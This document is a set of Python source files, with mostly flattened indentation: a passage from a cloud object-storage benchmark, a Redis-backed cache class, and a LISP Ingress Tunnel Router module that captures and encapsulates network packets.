bucket_name = FLAGS.object_storage_bucket_name or 'pkb%s' % FLAGS.run_uri
if FLAGS.object_storage_apply_region_suffix_to_bucket_name:
# Avoid non-alphanumeric characters in the region as bucket names on some
# clouds cannot contain non-alphanumeric characters.
bucket_name = '%s%s' % (bucket_name,
re.sub(r'[\W_]', '', FLAGS.object_storage_region))
service = object_storage_service.GetObjectStorageClass(FLAGS.storage)()
if (FLAGS.storage == 'Azure' and
FLAGS.object_storage_read_objects_prefix is not None):
# Storage provider is azure and we are reading existing objects.
# Need to prepare the ObjectStorageService with the existing storage
# account and resource group associated with the bucket containing our
# objects
service.PrepareService(
FLAGS.object_storage_region,
# On Azure, use an existing storage account if we
# are reading existing objects
(benchmark_spec.read_objects['azure_storage_account'],
benchmark_spec.read_objects['azure_resource_group']))
elif FLAGS.storage == 'Azure' and FLAGS.object_storage_bucket_name:
# We are using a bucket that may exist from a previous run. We should use
# a storage account and resource group for this bucket based on the same
# name (for consistency).
service.PrepareService(
FLAGS.object_storage_region,
# The storage account must not exceed 24 characters.
(bucket_name[:24], bucket_name + '-resource-group'),
try_to_create_storage_account_and_resource_group=True)
else:
service.PrepareService(FLAGS.object_storage_region)
vms = benchmark_spec.vms
vm_util.RunThreaded(lambda vm: PrepareVM(vm, service), vms)
# Make the bucket.
if benchmark_spec.read_objects is None:
# Fail if we cannot create the bucket as long as the bucket name was not
# set via a flag. If it was set by a flag, then we will still try to create
# the bucket, but won't fail if it was created. This supports running the
# benchmark on the same bucket multiple times.
raise_on_bucket_creation_failure = not FLAGS.object_storage_bucket_name
if FLAGS.storage == 'GCP' and FLAGS.object_storage_gcs_multiregion:
# Use a GCS multiregional bucket
multiregional_service = gcs.GoogleCloudStorageService()
multiregional_service.PrepareService(FLAGS.object_storage_gcs_multiregion
or DEFAULT_GCS_MULTIREGION)
multiregional_service.MakeBucket(
bucket_name, raise_on_failure=raise_on_bucket_creation_failure)
else:
# Use a regular bucket
service.MakeBucket(
bucket_name, raise_on_failure=raise_on_bucket_creation_failure)
# Save the service and the bucket name for later
benchmark_spec.service = service
benchmark_spec.bucket_name = bucket_name
def Run(benchmark_spec):
"""Run storage benchmark and publish results.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
Returns:
Total throughput in the form of tuple. The tuple contains
the sample metric (string), value (float), unit (string).
"""
logging.info('Start benchmarking object storage service, '
'scenario is %s, storage provider is %s.',
FLAGS.object_storage_scenario, FLAGS.storage)
service = benchmark_spec.service
bucket_name = benchmark_spec.bucket_name
metadata = {'storage_provider': FLAGS.storage}
vms = benchmark_spec.vms
if FLAGS[OBJECT_STORAGE_REGION].present:
metadata[REGIONAL_BUCKET_LOCATION] = FLAGS.object_storage_region
else:
metadata[REGIONAL_BUCKET_LOCATION] = DEFAULT
if FLAGS[OBJECT_STORAGE_GCS_MULTIREGION].present:
metadata[GCS_MULTIREGION_LOCATION] = FLAGS.object_storage_gcs_multiregion
else:
metadata[GCS_MULTIREGION_LOCATION] = DEFAULT
metadata.update(service.Metadata(vms[0]))
results = []
test_script_path = '/tmp/run/%s' % API_TEST_SCRIPT
try:
command_builder = APIScriptCommandBuilder(
test_script_path, STORAGE_TO_API_SCRIPT_DICT[FLAGS.storage], service)
except KeyError:
command_builder = UnsupportedProviderCommandBuilder(FLAGS.storage)
for name, benchmark in [('cli', CLIThroughputBenchmark),
('api_data', OneByteRWBenchmark),
('api_data', SingleStreamThroughputBenchmark),
('api_namespace', ListConsistencyBenchmark)]:
if FLAGS.object_storage_scenario in {name, 'all'}:
benchmark(results, metadata, vms[0], command_builder,
service, bucket_name)
# MultiStreamRW and MultiStreamWrite support multiple VMs, so they have a
# slightly different calling convention than the others.
for name, benchmark in [('api_multistream', MultiStreamRWBenchmark),
('api_multistream_writes',
MultiStreamWriteBenchmark)]:
if FLAGS.object_storage_scenario in {name, 'all'}:
benchmark(results, metadata, vms, command_builder, service, bucket_name)
# MultiStreamRead has the additional 'read_objects' parameter
if FLAGS.object_storage_scenario in {'api_multistream_reads', 'all'}:
metadata['cold_objects_filename'] = benchmark_spec.read_objects_filename
metadata['cold_objects_age_hours'] = benchmark_spec.read_objects_age_hours
MultiStreamReadBenchmark(results, metadata, vms, command_builder, service,
bucket_name,
benchmark_spec.read_objects['objects_written'])
# Clear the bucket if we're not saving the objects for later
# This is needed for long running tests, or else the objects would just pile
# up after each run.
keep_bucket = (FLAGS.object_storage_objects_written_file_prefix is not None or
FLAGS.object_storage_dont_delete_bucket)
if not keep_bucket:
MultiStreamDelete(results, metadata, vms, command_builder, service,
bucket_name)
service.UpdateSampleMetadata(results)
return results
def Cleanup(benchmark_spec):
"""Clean up storage bucket/container and clean up vm.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
"""
if not hasattr(benchmark_spec, 'service'):
logging.info('Skipping cleanup as prepare method failed')
return
service = benchmark_spec.service
bucket_name = benchmark_spec.bucket_name
vms = benchmark_spec.vms
vm_util.RunThreaded(lambda vm: CleanupVM(vm, service), vms)
# Only clean up bucket if we're not saving the objects for a later run
keep_bucket = (FLAGS.object_storage_objects_written_file_prefix is not None or
FLAGS.object_storage_dont_delete_bucket)
if not keep_bucket:
service.DeleteBucket(bucket_name)
service.CleanupService()
|
caching.py
|
import json
import logging
import threading
import redis
import time
LOG = logging.getLogger(__name__)
def bootstrap_cache(host='127.0.0.1', password=None):
pool = redis.ConnectionPool(host=host, password=password)
return redis.StrictRedis(connection_pool=pool)
def connect_to_cache():
import os
cache_host = os.environ['REDIS_HOST']
cache_password = os.environ.get('REDIS_PASSWORD', None)
return bootstrap_cache(cache_host, cache_password)
class FactCache(object):
IS_JSON = 'JSON::'
def __init__(self, redis_conn, prefix, timeout_seconds=3600, loader=None,
preload=False, debug=False):
self._redis = redis_conn
self._prefix = prefix
self.timeout_seconds = timeout_seconds
self._loader = loader or self.noop
self._load_op = None
self._loading_lock = threading.BoundedSemaphore()
self._debug = debug
if redis_conn and preload:
self.get('')
@property
def is_available(self):
return self._redis.ping()
@property
def is_loading(self):
acquired_lock = False
try:
acquired_lock = self._loading_lock.acquire(blocking=False)
return not acquired_lock or (self._is_load_op_alive())
finally:
if acquired_lock:
self._loading_lock.release()
def __setitem__(self, key, value):
self.set(key, value)
def set(self, key, value):
cache_key = self._compound_key(key)
value = self._pickle(value)
return self._redis.setex(cache_key, self.timeout_seconds, value)
def load(self, payload):
self._load(payload)
def get(self, key, blocking=False):
compound_key = self._compound_key(key)
found = self._redis.get(compound_key)
if found:
if self._debug:
LOG.info('Cache Hit [%s] for key [%s]', self._prefix, key)
return self._unpickle(found)
if self._debug:
LOG.info('Cache Miss [%s] for key [%s]', self._prefix, key)
found = self._locked_get(key)
if blocking:
self._wait_for_loading_op()
return self.get(key)
else:
return found
def __getitem__(self, item):
return self.get(item)
def _compound_key(self, key):
return self._prefix + str(key)
def _locked_get(self, key):
with self._loading_lock:
self._wait_for_loading_op()
# Try one more time to find the key in the cache
compound_key = self._compound_key(key)
found = self._redis.get(compound_key)
if found:
return self._unpickle(found)
# Load the data and send to the cache
payload = self._loader()
def _load_this():
self._load(payload)
named = 'FactCache_Loading[%s]' % self._prefix
self._load_op = threading.Thread(target=_load_this, name=named)
self._load_op.start()
# TODO figure out the bug here when payload does not include
# the key but it still ends up in the cache somehow
return payload.get(key, None)
def _wait_for_loading_op(self):
if self._is_load_op_alive():
while self._load_op.is_alive():
time.sleep(0.01) # 10ms
def _is_load_op_alive(self):
return self._load_op and self._load_op.is_alive()
def _load(self, payload):
for key in payload:
self.set(key, payload[key])
def _pickle(self, value):
if not isinstance(value, str):
value = self.IS_JSON + json.dumps(value)
return value
    def _unpickle(self, found):
        # Redis returns bytes unless decode_responses=True, so normalize first.
        if isinstance(found, bytes):
            found = found.decode('utf-8')
        if isinstance(found, str) and found.startswith(self.IS_JSON):
            found = json.loads(found[len(self.IS_JSON):])
        return found
@staticmethod
def noop():
return {}
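# Minimal usage sketch, illustrative only. It assumes a reachable Redis (via
# REDIS_HOST) and a hypothetical load_facts() function that returns a dict of
# key -> value pairs:
#
#   cache = FactCache(connect_to_cache(), prefix='facts::',
#                     timeout_seconds=600, loader=load_facts)
#   value = cache.get('some-key')          # loads via load_facts() on a miss
#   cache['another-key'] = {'answer': 42}  # stored as JSON with the TTL above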
|
lisp-itr.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-itr.py
#
# This file performs LISP Ingress Tunnel Router (ITR) functionality.
#
# -----------------------------------------------------------------------------
import lisp
import lispconfig
import socket
import select
import threading
import pcappy
import time
import os
import commands
import struct
#------------------------------------------------------------------------------
#
# Global data structures relative to the lisp-itr process.
#
lisp_send_sockets = [None, None, None]
lisp_ipc_listen_socket = None
lisp_ipc_punt_socket = None
lisp_ephem_listen_socket = None
lisp_ephem_nat_socket = None
lisp_ephem_port = lisp.lisp_get_ephemeral_port()
lisp_ephem_nat_port = lisp.lisp_get_ephemeral_port()
lisp_raw_socket = None
lisp_raw_v6_socket = None
lisp_periodic_timer = None
lisp_itr_info_timer = None
#
# This is for testing sending from one local EID-prefix to another EID-prefix
# on the same system. Rather than natively forwarding a packet, the mapping
# system is used.
#
lisp_xtr_loopback = False
#
# Used to start pcap threads concurrently.
#
lisp_pcap_lock = threading.Lock()
#------------------------------------------------------------------------------
#
# lisp_itr_show_command
#
# Display state in an ITR.
#
def lisp_itr_show_command(parameter):
return(lispconfig.lisp_itr_rtr_show_command(parameter, "ITR", []))
#enddef
#
# lisp_itr_show_keys_command
#
# Call lispconfig.lisp_show_crypto_list().
#
def lisp_itr_show_keys_command(parameter):
return(lispconfig.lisp_show_crypto_list("ITR"))
#enddef
#
# lisp_itr_show_rloc_probe_command
#
# Display RLOC-probe list state in an ITR.
#
def lisp_itr_show_rloc_probe_command(parameter):
return(lispconfig.lisp_itr_rtr_show_rloc_probe_command("ITR"))
#enddef
#
# lisp_itr_process_timer
#
# This is the ITR's 60-second periodic timer routine. We typically use it
# to time-out map-cache entries. But in the case where we are acting as an
# L2-overlay ITR, we also send Map-Requests to retrieve the broadcast
# entry so we have the latest replication-list before we need it.
#
def lisp_itr_process_timer(lisp_sockets, lisp_ephem_port):
lisp.lisp_set_exception()
#
# Remove nonce entries from crypto-list.
#
for keys in lisp.lisp_crypto_keys_by_nonce.values():
for key in keys: del(key)
#endfor
lisp.lisp_crypto_keys_by_nonce = {}
#
# If doing L2-overlays, get map-cache entry from (0000-0000-0000/0,
# ffff-ffff-ffff/48).
#
if (lisp.lisp_l2_overlay):
afi = lisp.LISP_AFI_MAC
iid = lisp.lisp_default_iid
s = lisp.lisp_address(afi, "0000-0000-0000", 0, iid)
s.mask_len = 0
d = lisp.lisp_address(afi, "ffff-ffff-ffff", 48, iid)
lisp.lisp_send_map_request(lisp_sockets, lisp_ephem_port, s, d, None)
#endif
#
# Timeout Map-Cache entries.
#
lisp.lisp_timeout_map_cache(lisp.lisp_map_cache)
#
# Restart periodic timer.
#
lisp_periodic_timer = threading.Timer(60, lisp_itr_process_timer,
[lisp_sockets, lisp_ephem_port])
lisp_periodic_timer.start()
return
#enddef
#
# lisp_itr_timeout_dynamic_eids
#
# Check to see if dynamic-EIDs have stopped sending data. If so, remove the
# state and stop registering them.
#
def lisp_itr_timeout_dynamic_eids(lisp_socket):
lisp.lisp_set_exception()
now = lisp.lisp_get_timestamp()
for db in lisp.lisp_db_list:
if (db.dynamic_eid_configured() == False): continue
delete_list = []
for dyn_eid in db.dynamic_eids.values():
ts = dyn_eid.last_packet
if (ts == None): continue
if (ts + dyn_eid.timeout > now): continue
#
            # Check hardware to see if the dyn-EID has had packets SENT to it.
            # We want the opposite, but this is all we get from Arista.
#
if (lisp.lisp_program_hardware):
prefix = dyn_eid.dynamic_eid.print_prefix_no_iid()
if (lisp.lisp_arista_is_alive(prefix)):
lisp.lprint(("Hardware indicates dynamic-EID {} " + \
"still active").format(lisp.green(prefix, False)))
continue
#endif
#endif
#
# Tell ETR process so it can register dynamic-EID.
#
eid_str = dyn_eid.dynamic_eid.print_address()
ipc = "learn%{}%None".format(eid_str)
ipc = lisp.lisp_command_ipc(ipc, "lisp-itr")
lisp.lisp_ipc(ipc, lisp_socket, "lisp-etr")
lisp.lprint("Dynamic-EID {}".format( \
lisp.bold(lisp.green(eid_str, False) + " activity timeout",
False)))
delete_list.append(eid_str)
#endfor
#
# Remove the timed out entries from db.dynamic_eids{}.
#
for eid_str in delete_list: db.dynamic_eids.pop(eid_str)
#endfor
#
# Restart periodic timer.
#
threading.Timer(lisp.LISP_DEFAULT_DYN_EID_TIMEOUT,
lisp_itr_timeout_dynamic_eids, [lisp_socket]).start()
return
#enddef
#
# lisp_get_active_interfaces
#
# Get interfaces that are plugged in, including loopback interfaces.
#
# We need to test these 3 types of lines from "ifconfig" output:
#
# aten2 Link encap:Ethernet HWaddr 00:1F:A0:07:0C:04
# eth7: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
# en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
#
def lisp_get_active_interfaces():
if (lisp.lisp_is_macos()): return(["en0", "en1", "lo0"])
#
# Linux distributions have different ifconfig output format.
#
gs = "Link encap"
interfaces = commands.getoutput("ifconfig | egrep '{}'".format(gs))
if (interfaces == ""):
gs = ": flags="
interfaces = commands.getoutput("ifconfig | egrep '{}'".format(gs))
#endif
interfaces = interfaces.split("\n")
return_interfaces = []
for interface in interfaces:
ifname = interface.split(gs)[0].replace(" ", "")
return_interfaces.append(ifname)
#endfor
return(return_interfaces)
#enddef
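#
# For example, the line "eth7: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu
# 1500" yields the interface name "eth7" once the ": flags=" separator is
# split off and spaces are removed.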
#
# lisp_itr_startup
#
# Initialize this LISP ITR process. Returns True on success, False otherwise.
#
def lisp_itr_startup():
global lisp_send_sockets
global lisp_ipc_listen_socket
global lisp_ipc_punt_socket
global lisp_ephem_listen_socket
global lisp_ephem_nat_socket
global lisp_raw_socket, lisp_raw_v6_socket
lisp.lisp_i_am("itr")
lisp.lisp_set_exception()
lisp.lisp_print_banner("ITR starting up")
#
# Get local address for source RLOC for encapsulation.
#
lisp.lisp_get_local_interfaces()
lisp.lisp_get_local_macs()
if (lisp.lisp_get_local_addresses() == False): return(False)
#
# Open send socket.
#
lisp_send_sockets[0] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV4)
lisp_send_sockets[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
lisp_ipc_listen_socket = lisp.lisp_open_listen_socket("", "lisp-itr")
lisp_ipc_punt_socket = lisp.lisp_open_listen_socket("", "lispers.net-itr")
lisp_send_sockets[2] = lisp_ipc_listen_socket
address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
lisp_ephem_listen_socket = lisp.lisp_open_listen_socket(address,
str(lisp_ephem_port))
#
    # Used for listening for Info-Replies for NAT-traversal support.
#
lisp_ephem_nat_socket = lisp.lisp_open_listen_socket("0.0.0.0",
str(lisp_ephem_nat_port))
#
# Open up raw socket so we can send with IP headers after decapsulation.
#
lisp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_RAW)
lisp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
if (lisp.lisp_is_raspbian() == False):
lisp_raw_v6_socket = socket.socket(socket.AF_INET6, socket.SOCK_RAW,
socket.IPPROTO_UDP)
#endif
#
# This is used by the ITR to send RTR status change information to the
# ETR. Since RLOC-probing runs inside the lisp library, when state changes
# occur, an IPC will have to be sent from the timer thread. This is the
# only use-case for lisp.lisp_ipc_socket.
#
lisp.lisp_ipc_socket = lisp_ipc_listen_socket
#
    # Start thread that waits for database-mapping commands and then sets up
    # packet capture.
#
threading.Thread(target=lisp_itr_get_capture_info).start()
#
# Load map-cache from checkpoint file before we start writing to it.
#
lisp.lisp_load_checkpoint()
#
# Should we load-split pings?
#
lisp.lisp_load_split_pings = (os.getenv("LISP_LOAD_SPLIT_PINGS") != None)
#
# Start map-cache timeout timer.
#
lisp_periodic_timer = threading.Timer(60, lisp_itr_process_timer,
[lisp_send_sockets, lisp_ephem_port])
lisp_periodic_timer.start()
#
# Start dynamic-EID timeout timer.
#
threading.Timer(lisp.LISP_DEFAULT_DYN_EID_TIMEOUT,
lisp_itr_timeout_dynamic_eids, [lisp_ipc_listen_socket]).start()
return(True)
#enddef
#
# lisp_itr_count_eid_prefixes
#
# Count the number of "prefix" sub-commands inside of each "lisp database-
# mapping" command.
#
def lisp_itr_count_eid_prefixes():
f = open("./lisp.config", "r")
within = False
count = 0
for line in f:
if (line == "lisp database-mapping {\n"): within = True
if (line == "}\n"): within = False
if (within == False): continue
if (line[0] == " " and line.find("prefix {") != -1): count += 1
#endif
f.close()
return(count)
#enddef
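#
# For illustration only: a hypothetical lisp.config clause of the form the
# parser above expects. Each "prefix {" sub-command inside the
# "lisp database-mapping {" clause is counted; the EID-prefix and interface
# values below are made-up examples, not defaults.
#
# lisp database-mapping {
#     prefix {
#         instance-id = 0
#         eid-prefix = 10.1.0.0/16
#     }
#     rloc {
#         interface = eth0
#     }
# }
#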
#
# lisp_itr_get_local_eid_prefixes
#
# Check the number of "lisp database-mapping" commands we will process. Wait
# for them to be processed and only return when all are processed.
#
# Return array of static EID-prefixes and an array of dynamic EID-prefixes.
#
def lisp_itr_get_local_eid_prefixes():
#
# Count the number of "prefix" sub-commands within a "lisp database-
# mapping" command clause in the lisp.config file.
#
count = lisp_itr_count_eid_prefixes()
#
    # Does the user want us to wait longer than a second to check if the
    # commands are done? If the CPU is going to be busy during startup, the
    # wait-time should be made longer..
#
wait_time = os.getenv("LISP_ITR_WAIT_TIME")
wait_time = 1 if (wait_time == None) else int(wait_time)
#
# Wait for database-mapping commands to execute. We need to retrieve
# EID-prefixes we need to listen on.
#
while (count != len(lisp.lisp_db_list)):
lisp.lprint(("Waiting {} second(s) for {} database-mapping EID-" + \
"prefixes, {} processed so far ...").format(wait_time, count,
len(lisp.lisp_db_list)))
time.sleep(wait_time)
#endwhile
#
# Return each IPv4, IPv6, or MAC EIDs. These are the ones we need to
# pass to pcap.
#
sources = []
dyn_eids = []
for db in lisp.lisp_db_list:
if (db.eid.is_ipv4() or db.eid.is_ipv6() or db.eid.is_mac()):
eid_str = db.eid.print_prefix_no_iid()
if (db.dynamic_eid_configured()): dyn_eids.append(eid_str)
sources.append(eid_str)
#endif
#endfor
return(sources, dyn_eids)
#enddef
#
# lisp_itr_get_capture_info
#
# Thread to wait for database-mapping commands to finish processing so we can
# get local EID-prefixes to be source filters for packet capture.
#
def lisp_itr_get_capture_info():
global lisp_pcap_lock
lisp.lisp_set_exception()
#
# Wait for database-mapping commands to execute. We need to retrieve
# EID-prefixes we need to listen on.
#
sources, dyn_eids = lisp_itr_get_local_eid_prefixes()
#
# If "ipc-data-plane = yes" is configured, we do not need to do any
# data-plane forwarding. There is another module running with the
# lispers.net control-plane that is doing data-plane forwarding. We'll
# get punts via the lispers.net-itr named socket. But we do have to
# packet capture RLOC-probe replies. Also capture multicast Map-Register
# messages for LISP-Decent.
#
cp_pfilter = None
if (lisp.lisp_ipc_data_plane):
lisp.lprint(lisp.bold("Data-plane packet capture disabled", False))
cp_pfilter = "(udp src port 4342 and ip[28] == 0x28)" + \
" or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
lisp.lprint("Control-plane capture: '{}'".format(cp_pfilter))
else:
lisp.lprint("Capturing packets for source-EIDs {}".format( \
lisp.green(str(sources), False)))
#endif
if (lisp.lisp_pitr): lisp.lprint("Configured for PITR functionality")
#
# We want the kernel to handle any packets with source AND destination
# that matches any EID-prefixes for the site. Any other case, we want
# the pcap filters to get the packet to this lisp-itr process.
#
l2_overlay = lisp.lisp_l2_overlay
if (l2_overlay == False):
if (lisp.lisp_is_linux()): lisp_itr_kernel_filter(sources, dyn_eids)
#endif
#
# Build packet capture filter so we get packets for configured source EID-
# prefixes.
#
if (cp_pfilter == None):
if (lisp.lisp_pitr):
pfilter = lisp_itr_build_pcap_filter(sources, [], False, True)
else:
pfilter = lisp_itr_build_pcap_filter(sources, dyn_eids, l2_overlay,
False)
#endif
else:
pfilter = cp_pfilter
#endif
#
# User can select which interfaces to pcap on.
#
interfaces = lisp_get_active_interfaces()
pcap_list = os.getenv("LISP_PCAP_LIST")
if (pcap_list == None):
us = ""
rloc_interfaces = []
else:
eid_interfaces = list(set(pcap_list.split()) & set(interfaces))
rloc_interfaces = list(set(pcap_list.split()) ^ set(interfaces))
us = "user-selected "
lisp.lprint("User pcap-list: {}, active-interfaces: {}".format( \
pcap_list, interfaces))
interfaces = eid_interfaces
#endif
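    #
    # Example of the set arithmetic above (hypothetical values): with
    # LISP_PCAP_LIST="eth0 eth1" and active interfaces {"eth0", "eth2"},
    # the intersection (&) gives eid_interfaces {"eth0"} and the symmetric
    # difference (^) gives rloc_interfaces {"eth1", "eth2"}.
    #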
#
# Start a pcap thread so we can receive packets from applications on this
# system. But make sure the device is up on A10 devices. If ethernet MAC
# capturing, do not listen on non ethernet interfaces.
#
mac_capturing = (pfilter.find("ether host") != -1)
for device in interfaces:
if (device in ["lo", "lispers.net"] and mac_capturing):
lisp.lprint(("Capturing suppressed on interface {}, " + \
"MAC filters configured").format(device))
continue
#endif
args = [device, pfilter, lisp_pcap_lock]
lisp.lprint("Capturing packets on {}interface {}".format(us, device))
threading.Thread(target=lisp_itr_pcap_thread, args=args).start()
#endfor
if (cp_pfilter): return
#
# Start a pcap thread so we can receive RLOC-probe Map-Replies packets on
# RLOC interfaces. This is only called when LISP_PCAP_LIST is set.
#
probe_pfilter = "(udp src port 4342 and ip[28] == 0x28)"
for device in rloc_interfaces:
args = [device, probe_pfilter, lisp_pcap_lock]
lisp.lprint("Capture RLOC-probe replies on RLOC interface {}".format( \
device))
threading.Thread(target=lisp_itr_pcap_thread, args=args).start()
#endfor
return
#enddef
#
# lisp_itr_shutdown
#
# Shut down this process.
#
def lisp_itr_shutdown():
#
# Cancel periodic Info timer threads.
#
if (lisp_itr_info_timer): lisp_itr_info_timer.cancel()
#
# Close sockets.
#
lisp.lisp_close_socket(lisp_send_sockets[0], "")
lisp.lisp_close_socket(lisp_send_sockets[1], "")
lisp.lisp_close_socket(lisp_ephem_listen_socket, "")
lisp.lisp_close_socket(lisp_ephem_nat_socket, "")
lisp.lisp_close_socket(lisp_ipc_listen_socket, "lisp-itr")
lisp.lisp_close_socket(lisp_ipc_punt_socket, "lispers.net-itr")
return
#enddef
#
# lisp_itr_data_plane
#
# Do map-cache lookup and encapsulate packet.
#
def lisp_itr_data_plane(packet, device, input_interface, macs, my_sa):
global lisp_send_sockets
global lisp_ephem_port
global lisp_raw_socket, lisp_raw_v6_socket
global lisp_ipc_listen_socket
#
# Check RLOC-probe Map-Reply. We need to grab the TTL from IP header.
#
orig_packet = packet
packet, source, port, ttl = lisp.lisp_is_rloc_probe(packet, 1)
if (orig_packet != packet):
if (source == None): return
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port, ttl)
return
#endif
packet = lisp.lisp_packet(packet)
if (packet.decode(False, None, None) == None): return
#
# For locally source packets from this system, the MAC address may
# be the default router. Check source to see if assigned to this system,
# and if so, accept on interface "device".
#
if (my_sa): input_interface = device
#
# Get instance-ID for incoming interface.
#
source_eid = packet.inner_source
iid = lisp.lisp_get_interface_instance_id(input_interface, source_eid)
packet.inner_dest.instance_id = iid
packet.inner_source.instance_id = iid
#
# Print some useful header fields and strip outer headers..
#
if (macs != ""): macs = ", MACs: " + macs + ","
packet.print_packet("Receive {}{}".format(device, macs), False)
#
# Drop packet if input interface not found based on MAC address used.
#
if (device != input_interface and device != "lispers.net"):
lisp.dprint("Not our MAC address on interface {}, pcap interface {}". \
format(input_interface, device))
return
#endif
lisp_decent = lisp.lisp_decent_push_configured
if (lisp_decent):
multicast = packet.inner_dest.is_multicast_address()
local = packet.inner_source.is_local()
lisp_decent = (local and multicast)
#endif
if (lisp_decent == False):
#
# Only forward packets from source-EIDs.
#
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)
if (db == None):
lisp.dprint("Packet received from non-EID source")
return
#endif
#
# Check to see if we are doing dynamic-EID discovery.
#
if (db.dynamic_eid_configured()):
i = lisp.lisp_allow_dynamic_eid(input_interface,
packet.inner_source)
if (i):
lisp.lisp_itr_discover_eid(db, packet.inner_source,
input_interface, i, lisp_ipc_listen_socket)
else:
e = lisp.green(packet.inner_source.print_address(), False)
lisp.dprint("Disallow dynamic-EID {} on interface {}".format(e,
input_interface))
return
#endif
#endif
if (packet.inner_source.is_local() and
packet.udp_dport == lisp.LISP_CTRL_PORT): return
#endif
#
    # Do input processing for currently supported packet types. Initialize
    # igmp here since it is only set on the IPv4 input path but is tested
    # later when the outer TTL is chosen.
    #
    igmp = False
    if (packet.inner_version == 4):
igmp, packet.packet = lisp.lisp_ipv4_input(packet.packet)
if (packet.packet == None): return
packet.inner_ttl -= 1
elif (packet.inner_version == 6):
packet.packet = lisp.lisp_ipv6_input(packet)
if (packet.packet == None): return
packet.inner_ttl -= 1
else:
packet.packet = lisp.lisp_mac_input(packet.packet)
if (packet.packet == None): return
packet.encap_port = lisp.LISP_L2_DATA_PORT
#endif
#
# First check if destination is to any local EID-prefixes from database-
# mapping commands. In this case, we need to natively forward.
#
if (lisp_xtr_loopback == False):
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
        if (db and db.dynamic_eid_configured() == False):
lisp.dprint(("Packet destined to local EID-prefix {}, " + \
"natively forwarding").format(db.print_eid_tuple()))
packet.send_packet(lisp_raw_socket, packet.inner_dest)
return
#endif
#endif
#
# Do map-cache lookup.
#
mc = lisp.lisp_map_cache_lookup(packet.inner_source, packet.inner_dest)
if (mc): mc.add_recent_source(packet.inner_source)
#
# If "secondary-iid" is configured, we want to check the secondary
# map-cache if a lookup miss occured in the default IID for this source
# EID-prefix. If destination EID found in secondary map-cache, use it.
# Otherwise, send Map-Request for EID in default IID.
#
secondary_iid = db.secondary_iid if (db != None) else None
if (secondary_iid and mc and mc.action == lisp.LISP_NATIVE_FORWARD_ACTION):
dest_eid = packet.inner_dest
dest_eid.instance_id = secondary_iid
mc = lisp.lisp_map_cache_lookup(packet.inner_source, dest_eid)
if (mc): mc.add_recent_source(packet.inner_source)
#endif
#
# Map-cache lookup miss.
#
if (mc == None or mc.action == lisp.LISP_SEND_MAP_REQUEST_ACTION):
if (lisp.lisp_rate_limit_map_request(packet.inner_source,
packet.inner_dest)): return
lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
packet.inner_source, packet.inner_dest, None)
if (packet.is_trace()):
lisp.lisp_trace_append(packet, reason="map-cache miss")
#endif
return
#endif
#
# Send Map-Request to see if there is a RLOC change or to refresh an
# entry that is about to time out.
#
if (mc and mc.is_active() and mc.has_ttl_elapsed()):
lisp.lprint("Refresh map-cache entry {}".format( \
lisp.green(mc.print_eid_tuple(), False)))
lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
packet.inner_source, packet.inner_dest, None)
#endif
#
# Update stats for entry. Stats per RLOC is done in lisp_mapping.select_
# rloc().
#
mc.stats.increment(len(packet.packet))
#
    # Encapsulate, native forward, or encapsulate-and-replicate packet.
#
dest_rloc, dest_port, nonce, action, rle, rloc_entry = \
mc.select_rloc(packet, lisp_ipc_listen_socket)
if (dest_rloc == None and rle == None):
if (action == lisp.LISP_NATIVE_FORWARD_ACTION):
lisp.dprint("Natively forwarding")
packet.send_packet(lisp_raw_socket, packet.inner_dest)
if (packet.is_trace()):
lisp.lisp_trace_append(packet, reason="not an EID")
#endif
return
#endif
r = "No reachable RLOCs found"
lisp.dprint(r)
if (packet.is_trace()): lisp.lisp_trace_append(packet, reason=r)
return
#endif
if (dest_rloc and dest_rloc.is_null()):
r = "Drop action RLOC found"
lisp.dprint(r)
if (packet.is_trace()): lisp.lisp_trace_append(packet, reason=r)
return
#endif
#
# Setup outer header for either unicast or multicast transmission..
#
packet.outer_tos = packet.inner_tos
packet.outer_ttl = 32 if (igmp) else packet.inner_ttl
#
# Do unicast encapsulation.
#
if (dest_rloc):
packet.outer_dest.copy_address(dest_rloc)
version = packet.outer_dest.afi_to_version()
packet.outer_version = version
source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \
lisp.lisp_myrlocs[1]
packet.outer_source.copy_address(source_rloc)
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet, rloc_entry=rloc_entry) \
== False): return
#endif
#
# Encode new LISP, UDP, and outer header.
#
if (packet.encode(nonce) == None): return
if (len(packet.packet) <= 1500): packet.print_packet("Send", True)
#
# Send out on raw socket.
#
raw_socket = lisp_raw_v6_socket if version == 6 else lisp_raw_socket
packet.send_packet(raw_socket, packet.outer_dest)
elif (rle):
#
        # Do replication if an RLE is returned. Since we are an ITR, replicate
        # to level-0 RTRs (or ETRs) only (that is, first-level boxes only)..
#
level = rle.rle_nodes[0].level
orig_len = len(packet.packet)
for node in rle.rle_forwarding_list:
if (node.level != level): return
packet.outer_dest.copy_address(node.address)
if (lisp_decent): packet.inner_dest.instance_id = 0xffffff
version = packet.outer_dest.afi_to_version()
